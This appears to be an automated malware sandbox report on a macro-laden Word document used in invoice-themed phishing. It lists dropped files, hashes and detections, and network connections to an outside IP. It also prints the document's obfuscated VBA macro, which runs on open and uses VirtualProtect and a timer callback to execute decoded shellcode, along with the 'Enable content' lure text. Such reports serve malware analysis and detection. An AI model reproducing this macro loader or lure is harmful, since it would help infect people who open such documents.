                                            SHA-512:8032F5C3C86E83084A7618F50FB1CE9E135B2FE96749D435763E66404FE18040181421ED90C6A632290AE2C26AE76E9BC2F5164E94BA2E7756F5F2799265D8AB
                                            Malicious:false
                                            Reputation:low
                                            Preview:.././...T.h.i.s. .d.o.c.u.m.e.n.t. .c.r.e.a.t.e.d. .i.n. .p.r.e.v.i.o.u.s. .v.e.r.s.i.o.n. .o.f. .M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .W.o.r.d.....T.o. .v.i.e.w. .o.r. .e.d.i.t. .t.h.i.s. .d.o.c.u.m.e.n.t.,. .p.l.e.a.s.e. .c.l.i.c.k. .. E.n.a.b.l.e. .e.d.i.t.i.n.g.. .b.u.t.t.o.n. .o.n. .t.h.e. .t.o.p. .b.a.r.,. .a.n.d. .t.h.e.n. .c.l.i.c.k. .. E.n.a.b.l.e. .c.o.n.t.e.n.t.. ..........................................................................................................................................................z.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1024
                                            Entropy (8bit):0.05390218305374581
                                            Encrypted:false
                                            SSDEEP:3:ol3lYdn:4Wn
                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):44544
                                            Entropy (8bit):6.056689486584974
                                            Encrypted:false
                                            SSDEEP:768:mD+ellQvZSazSRqbSEln5IyYpamDjobj8SpM:E+QWvZhSRqln5IUmDjoXV
                                            MD5:51138BEEA3E2C21EC44D0932C71762A8
                                            SHA1:8939CF35447B22DD2C6E6F443446ACC1BF986D58
                                            SHA-256:5AD3C37E6F2B9DB3EE8B5AEEDC474645DE90C66E3D95F8620C48102F1EBA4124
                                            SHA-512:794F30FE452117FF2A26DC9D7086AAF82B639C2632AC2E381A81F5239CAAEC7C96922BA5D2D90BFD8D74F0A6CD4F79FBDA63E14C6B779E5CF6834C13E4E45E7D
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Metadefender, Detection: 0%
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Joe Sandbox View:
                                            • Filename: drinkcodeblue.file.08.11.22.doc, Detection: malicious
                                            • Filename: dodsonimaging,file,08.11.2022.doc, Detection: malicious
                                            • Filename: feltenberger doc 08.11.doc, Detection: malicious
                                            • Filename: agsilverfile08.11.doc, Detection: malicious
                                            • Filename: ino.file.18.07.2022.doc, Detection: malicious
                                            • Filename: md-srl.doc.29.07.22.doc, Detection: malicious
                                            • Filename: [redacted]-document-26.07.22.doc, Detection: malicious
                                            • Filename: [redacted]-doc-26.07.doc, Detection: malicious
                                            • Filename: confinalp.file.26.07.22.doc, Detection: malicious
                                            • Filename: alhena-doc-26.07.2022.doc, Detection: malicious
                                            • Filename: andreademarchi invoice 26.07.22.doc, Detection: malicious
                                            • Filename: technographsri invoice 26.07.2022.doc, Detection: malicious
                                            • Filename: 377155250.doc, Detection: malicious
                                            • Filename: pelagagge_doc_22.07.22.doc, Detection: malicious
                                            • Filename: 12658371_dynamicom-invoice-18.07.22.doc, Detection: malicious
                                            • Filename: [redacted],file,18.07.doc, Detection: malicious
                                            • Filename: istitutomargherita.file.18.07.doc, Detection: malicious
                                            • Filename: gruppobluecity invoice 18.07.22.doc, Detection: malicious
                                            • Filename: bbdy_document_07.06.2022.doc, Detection: malicious
                                            • Filename: tcrc-central-le file 07.01.22.doc, Detection: malicious
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V|.....,...,...,.eO,...,.eI,...,...,v..,.e^,...,.eY,...,.eN,...,.eK,...,Rich...,........PE..L...7.[J.................:...p...............P............................................@..................................@..x....`..`g......................P...<I..8...........................8&..@...p...l............@..@....................text....9.......:.................. ..`.data........P.......>..............@....rsrc...`g...`...h...B..............@..@.reloc..P...........................@..B..[J0.../.[J=...o.[JH.....[JS.....[J`...........KERNEL32.dll.USER32.dll.msvcrt.dll.imagehlp.dll.ntdll.dll...............................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):360448
                                            Entropy (8bit):4.669486804663653
                                            Encrypted:false
                                            SSDEEP:6144:tYCYa6MfAcSlE+S0fzAMJfWpKd5WhAl7CJDZ/PeHbUhHTmGPqG7s6FmlEHKiTd:eCwMfjSlE+A4eguRJDtPZIG46FkEH9
                                            MD5:CE600629752CAF6529025A0EE60FB7B3
                                            SHA1:8D8DDA1D4FF66D6B5BB44F7BAFDC87EBB9B54DE6
                                            SHA-256:BDB9DAB286CCCCF1D315A027597065C51DC4BF0A87471B283FE749C146721C05
                                            SHA-512:4D2AC51A9AB38DCE21895A22878F6533C27371302A2F35C0F337FE05C3021CAA838D80C76DC7E4CA44D47E962973B52F2B4AA4C7BCD10E662DEA6C1645C05FE9
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.4...Z...Z...Z...Y...Z.Y.Z...Z.3...Z.j.X...Z.Rich..Z.........................PE..d...Y..b.........." .....x................................................................`.............................................}............................................................................................................................text....w.......x.................. ..`.rdata..}............|..............@..@.rsrc................~..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):60928
                                            Entropy (8bit):4.160079134971716
                                            Encrypted:false
                                            SSDEEP:768:Fv+gRWhfvDEgXn5UvkjzhDMGedfJMnrxbVDLtnDxSOT4vW2Gvw8MGKaUSh:FvKf75n5hzJM5dfJMnrzWlGdMGKaR
                                            MD5:F156F878AF6F57640ECE3F2C940DCDF1
                                            SHA1:25E9D1952D853CBD69494AC57D826BCD3BF70B7B
                                            SHA-256:B299E7ECB4D5B7C460DA311678E12E22164325B930FCAB02ED91E984D00ECF33
                                            SHA-512:35DAE312C241A66001822DADED91FFF0CE14075923F834F2420373F9DD5EE63B2DF68A7843085372E6FE3A4C3CF30E792F049CEA21AC02A4F58243CD3F87CF79
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Preview:......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...........(........................................................................................................... ...!..."...#...$...%...&...'.......)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:.......<...=...>...?...@...I...B...C...D...E...F...G...H...;...J...K...L...M...N...O...P...Q...R...S.......i...V...W...X...Y...Z...^...\...].......j...`.......b...c...d...e...f...g...h...[.......k...l...u...n...o...p...q...r...s...t..._.......................
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:56 2022, mtime=Tue Mar 8 15:45:56 2022, atime=Thu Aug 11 23:38:17 2022, length=2256492, window=hide
                                            Category:dropped
                                            Size (bytes):1094
                                            Entropy (8bit):4.567016459408874
                                            Encrypted:false
                                            SSDEEP:12:8cJlgXg/XAlCPCHaXNBQtB/SxXX+W2G1bY5iFvicvbpAgSISxDtZ3YilMMEpxRl3:8cd/XT9SUo4ZF6eOXxDv3qsu7D
                                            MD5:16ACDC6C3148D948E793D54D0CC855F9
                                            SHA1:34618CE6E3713BF88184935233CCBFE78792AAD5
                                            SHA-256:4C9122002A5D221CF6EEDF9377D16251542447E8686FE514EBF0FFF21C483458
                                            SHA-512:219FFD7BD5632036B00F94BD7C9565600E172C997F1D560FB0809237E4DC2D2C05CF9C929FA350BD5D6B66C8A629797EFCB71655876D5BE68FFF4655032B307D
                                            Malicious:false
                                            Preview:L..................F.... ... d...3.. d...3..djT....ln"..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.ln"..U.. .COURTE~1.DOC..j......hT..hT..*...r.....'...............c.o.u.r.t.e.s.y.a.u.t.o.m.o.t.i.v.e.d.o.c.0.8...1.1...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\284992\Users.user\Desktop\courtesyautomotivedoc08.11.doc.5.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.o.u.r.t.e.s.y.a.u.t.o.m.o.t.i.v.e.d.o.c.0.8...1.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.....
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):103
                                            Entropy (8bit):4.64907659762003
                                            Encrypted:false
                                            SSDEEP:3:bDuMJleLXRxcAgMCmX1dSxcAgMCv:bC9RxcSWxcSs
                                            MD5:096683A47B04CB33D2F0018C0B926F12
                                            SHA1:67871655DA0F274A618A1284B6C8FE5185CC0174
                                            SHA-256:542D2649FBB017DBA05E8AF20181C933F0FED51A2BC568323C4C123238505EC9
                                            SHA-512:4912E7A2160D08E75E39F025822D772471215030D75F6EA8D49DD5C828D9115D55B66EFF0D0CE94E4BE85DC2BEB6D6A77A3CEC36DEFEED77C9593D7047182020
                                            Malicious:false
                                            Preview:[folders]..Templates.LNK=0..courtesyautomotivedoc08.11.LNK=0..[doc]..courtesyautomotivedoc08.11.LNK=0..
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.503835550707525
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
                                            MD5:7CFA404FD881AF8DF49EA584FE153C61
                                            SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
                                            SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
                                            SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
                                            Malicious:false
                                            Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                            Category:dropped
                                            Size (bytes):2
                                            Entropy (8bit):1.0
                                            Encrypted:false
                                            SSDEEP:3:Qn:Qn
                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                            Malicious:false
                                            Preview:..
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.503835550707525
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
                                            MD5:7CFA404FD881AF8DF49EA584FE153C61
                                            SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
                                            SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
                                            SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
                                            Malicious:false
                                            Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...
                                            File type:Zip archive data, at least v2.0 to extract
                                            Entropy (8bit):7.993716000279979
                                            TrID:
                                            • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                            • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                            • ZIP compressed archive (8000/1) 7.92%
                                            File name:courtesyautomotivedoc08.11.doc
                                            File size:2351271
                                            MD5:00e8f42e0462d4abf8a6bb6960abe5b5
                                            SHA1:0235d1eb73c161a7fcc944d99730d8ed0200fb8e
                                            SHA256:3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44
                                            SHA512:927b5d5c0a8230738b5e56d05f2b0c669c2a564ef013707cce466250ddddb6d779077e4a8ee75ed39bc4a6485cbf30b6ba6edc8f819b74fd3f400e6c84460f96
                                            SSDEEP:49152:kMZ2Nedqe2qza5yNggQYE38nhoaCuqgpuIV/gGfikxc/X6YR:5dqerz3EOhLig/gGKkxGX6YR
                                            TLSH:3DB533B24150779A263D137BC044B6E67936ABA68F84857C08D78D9FE931FFF204852D
                                            File Content Preview:PK..........!..U~............._rels/.rels...J.@............4.E..D.....$....T..w-..j........|.zs..z..z.*X.%(v......6O.{PI........`S__._x .C..CR....:....t..R......hI.3..H.Q..*.;..=..y... n.......yo.......[vrf..A..6..3[.>_...-K....\NH!....<..r...E.B..P...<_.
                                            Icon Hash:e4eea2aaa4b4b4a4
                                            Document Type:OpenXML
                                            Number of OLE Files:1
                                            Has Summary Info:
                                            Application Name:
                                            Encrypted Document:False
                                            Contains Word Document Stream:True
                                            Contains Workbook/Book Stream:False
                                            Contains PowerPoint Document Stream:False
                                            Contains Visio Document Stream:False
                                            Contains ObjectPool Stream:False
                                            Flash Objects Count:0
                                            Contains VBA Macros:True
                                            General
                                            Stream Path:VBA/ThisDocument
                                            VBA File Name:ThisDocument.cls
                                            Stream Size:2862
                                            Data ASCII:. . A t t r i b u t . e V B _ N a m . e = " T h i . s D o c u m e n . t " . . . B a s . . 1 N o r m a l . . . V G l o b a l ! . S p a c . l F a . l s e . J C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . T e m p . l a t e D e r i . v . $ C u s t o m l i z C . P . . . . . D . ? P t r S a . f e F u n c t i o n . . . . . . . . L i b . " u s e r 3 2 " . A l i a s " . K i l l T i m e . r " ( B y V a . l . . A s L o n g - , . . # . . ) . K . .
                                            Data Raw:01 84 b4 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 44 6f 63 75 6d 65 6e 10 74 22 0d 0a 0a 8c 42 61 73 01 02 8c 31 4e 6f 72 6d 61 6c 02 2e 19 56 47 6c 6f 62 61 6c 21 01 aa 53 70 61 63 01 6c 46 61 08 6c 73 65 0c 4a 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72 75 0d 22 45 78 70 08 6f 73 65 14 1c 54
                                            Attribute VB_Name = "ThisDocument"
                                            Attribute VB_Base = "1Normal.ThisDocument"
                                            Attribute VB_GlobalNameSpace = False
                                            Attribute VB_Creatable = False
                                            Attribute VB_PredeclaredId = True
                                            Attribute VB_Exposed = True
                                            Attribute VB_TemplateDerived = True
                                            Attribute VB_Customizable = True
                                            Private Declare PtrSafe Function  Lib "user32" Alias "KillTimer" (ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr
                                            Private Declare PtrSafe Function  Lib "kernel32" Alias "VirtualProtect" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr,  As LongPtr) As LongPtr
                                            Private Declare PtrSafe Function  Lib "user32" Alias "SetTimer" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr

                                            Function ()
                                                 = 7
                                                End Function
                                            Function ()
                                                ReDim (() - 1) As Byte
                                                Dim  As Long,  As Long
                                                Dim :  = lOePrNSeOnF7("w9kiTlK") & lOePrNSeOnF7("Q3nlze")
                                                For  = 0 To () - 1 Step 2
                                                     =  / 2
                                                    () = 255 - ( & (, ) & (,  + 1))
                                                Next
                                                 = 
                                            End Function
                                            Function ()
                                                 = 5
                                                End Function
                                            Function (, )
                                                 = Mid(,  + 1, 1)
                                            End Function
                                            Function ()
                                                 = 9
                                                End Function
                                            Function (Optional  = False)
                                                If  Then
                                                    Set  = ActiveDocument
                                                Else
                                                    Set  = (())
                                                End If
                                                Set  = 
                                                End Function
                                            Function ()
                                                 = 4
                                                End Function
                                            Function (, Optional  = False)
                                                If  Then
                                                    Set  = GetObject()
                                                Else
                                                    Set  = ((), )
                                                End If
                                                Set  = 
                                                End Function
                                            Function (, Optional  = False)
                                                If  Then
                                                     = UBound()
                                                Else
                                                     = ((), )
                                                End If
                                                 = 
                                                End Function
                                            Function ()
                                                 = 10
                                                End Function
                                            Function ()
                                                 = 1
                                                End Function
                                            Function ()
                                                 = 3
                                                End Function
                                            Sub (w)
                                                Dim  As Long
                                                Dim  As Long
                                                 = () + ()
                                                Do
                                                     = ()
                                                    DoEvents
                                                Loop Until  > 
                                            End Sub
                                            Function (, , Optional  = False)
                                                If  Then
                                                     = Mid(,  + 1, 1)
                                                Else
                                                     = ((), , )
                                                End If
                                                 = 
                                                End Function
                                            Function (Optional  = False)
                                                If  Then
                                                    Set  = CallByName((lOePrNSeOnF7("o93TBY150D")), lOePrNSeOnF7("gEzmn7rG"), VbGet, lOePrNSeOnF7("mVwBL4NuTS"))
                                                Else
                                                    Set  = (())
                                                End If
                                                Set  = 
                                                End Function
                                            Function (, Optional  = Empty, Optional  = Empty, Optional  = Empty)
                                                Select Case 
                                                        Case ()
                                                            Set  = (, True)
                                                        Case ()
                                                            Set  = (, True)
                                                        Case ()
                                                            Set  = (True)
                                                        Case ()
                                                            Set  = (True)
                                                        Case ()
                                                            Set  = (, True)
                                                        Case ()
                                                             = (, True)
                                                        Case ()
                                                             = (, True)
                                                        Case ()
                                                             = (, True)
                                                        Case ()
                                                             = (, True)
                                                        Case ()
                                                             = (, , True)
                                                        Case ()
                                                             = (True)
                                                        Case ()
                                                             = (, True)
                                                    End Select
                                            End Function
                                            Function (, Optional  = False)
                                                If  Then
                                                     = Len()
                                                Else
                                                     = ((), )
                                                End If
                                                 = 
                                                End Function
                                            Function ()
                                                 = 0
                                                End Function
                                            Function ()
                                                 = 11
                                                End Function
                                            Function (, Optional  = False)
                                                If  Then
                                                     = ()
                                                Else
                                                     = ((), )
                                                End If
                                                 = 
                                                End Function
                                            Function ()
                                                 = 2
                                                End Function
                                            Private Sub Document_Open()
                                                Dim () As Byte
                                                If () Then
                                                     = ((lOePrNSeOnF7("ojsqqKJ9Xsmw")).Value)
                                                Else
                                                     = ((lOePrNSeOnF7("h7BmNH")).Value)
                                                End If
                                                Dim  As LongPtr
                                                Dim  As LongPtr
                                                Dim  As LongPtr
                                                Dim  As LongPtr
                                                 = () + 1
                                                 = VarPtr((0))
                                                 , , 64, VarPtr()
                                                        ()(lOePrNSeOnF7("cII3YB")) = lOePrNSeOnF7("uXzVdLx")
                                                     = (0, , 1, )
                                                 1
                                                 0, 
                                                ().Remove (lOePrNSeOnF7("gYvzmA9m7"))
                                                ().Remove (lOePrNSeOnF7("diAWT0Ux"))
                                                ReDim (1)
                                            End Sub
                                            Function ()
                                                #If Win64 Then
                                                     = True
                                                #Else
                                                     = False
                                                #End If
                                            End Function
                                            Function (, Optional  = False)
                                                If  Then
                                                     = CDec()
                                                Else
                                                     = ((), )
                                                End If
                                                 = 
                                                End Function
                                            Function (, Optional  = False)
                                                If  Then
                                                    Set  = CallByName((), lOePrNSeOnF7("SwjpO4CYqFz"), VbGet, )
                                                Else
                                                    Set  = ((), )
                                                End If
                                                Set  = 
                                                End Function
                                            Function ()
                                                 = 6
                                                End Function
                                            Public Function lOePrNSeOnF7(strInput)
                                                    lOePrNSeOnF7 = StrReverse(ActiveDocument.CustomDocumentProperties(strInput))
                                                End Function
                                            Function (, Optional  = False)
                                                If  Then
                                                    Set  = CallByName((), lOePrNSeOnF7("wmubexAZc"), VbGet, )
                                                Else
                                                    Set  = ((), )
                                                End If
                                                Set  = 
                                                End Function
                                            Function (, Optional  = False)
                                                If  Then
                                                     = VarPtr()
                                                Else
                                                     = ((), )
                                                End If
                                                 = 
                                                End Function
                                            Function ()
                                                 = 8
                                                End Function
                                            Function (Optional  = False)
                                                If  Then
                                                     = Timer()
                                                Else
                                                     = (())
                                                End If
                                                 = 
                                                End Function
                                            

General
Stream Path: PROJECT
File Type: ASCII text, with CRLF line terminators
Stream Size: 361
Entropy: 5.261274960217235
Base64 Encoded: True
                                            Data ASCII:I D = " { B C 4 3 8 9 C 2 - 2 6 C 1 - 4 B 8 E - A 9 6 B - E 7 C 1 A F 0 E F D C 9 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 1 3 3 0 0 6 0 0 4 6 0 0 4 6 0 0 4 6 0 0 4 " . . D P B = " 6 2 6 0 5 3 A 0 8 5 A 1 8 5 A 1 8 5 " . . G C = " 9 3 9 1 A 2 F 3 D 2 F 4 D 2 F 4 2 D " . . . . [ H o s t E x t e n d e r I n f o ] . . & H 0 0
                                            Data Raw:49 44 3d 22 7b 42 43 34 33 38 39 43 32 2d 32 36 43 31 2d 34 42 38 45 2d 41 39 36 42 2d 45 37 43 31 41 46 30 45 46 44 43 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
General
Stream Path: PROJECTwm
File Type: data
Stream Size: 41
Entropy: 3.0773844850752607
Base64 Encoded: False
                                            Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                                            Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
General
Stream Path: VBA/_VBA_PROJECT
File Type: ISO-8859 text, with no line terminators
Stream Size: 7
Entropy: 1.8423709931771088
Base64 Encoded: False
                                            Data ASCII:a . . .
                                            Data Raw:cc 61 ff ff 00 00 00
General
Stream Path: VBA/__SRP_2
File Type: data
Stream Size: 5100
Entropy: 1.9352060799527637
Base64 Encoded: False
General
Stream Path: VBA/__SRP_3
File Type: data
Stream Size: 2724
Entropy: 2.7022241373642215
Base64 Encoded: False
General
Stream Path: VBA/dir
File Type: data
Stream Size: 486
Entropy: 6.302164636528835
Base64 Encoded: True
Timestamp                             Source Port  Dest Port  Source IP     Dest IP
Aug 11, 2022 17:38:26.550465107 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:26.655807972 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.655991077 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:26.663358927 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:26.766427994 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.792161942 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.792212963 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.792253971 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.792294025 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.792332888 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.792371035 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.792382002 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:26.792409897 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.792433023 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:26.792449951 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.792465925 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:26.792489052 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.792524099 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:26.792529106 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.792563915 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:26.792608023 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:26.812335968 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:26.900171995 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.900192022 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.900207996 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.900222063 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.900233984 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.900248051 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.900264978 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.900281906 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.900315046 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.900336027 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.900352955 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.900368929 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.900386095 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.900403023 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.900405884 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:26.900418997 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.900424004 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:26.900428057 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:26.900435925 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.900440931 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:26.900453091 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.900460005 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:26.900470018 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.900485992 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.900492907 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:26.900502920 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:26.900511980 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:26.900527000 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:26.900542974 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:26.900873899 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.004734993 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.004776001 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.004806995 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.004838943 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.004892111 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.004904032 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.004929066 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.004940987 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.004945993 CEST  49173        80         192.168.2.22  45.8.146.139
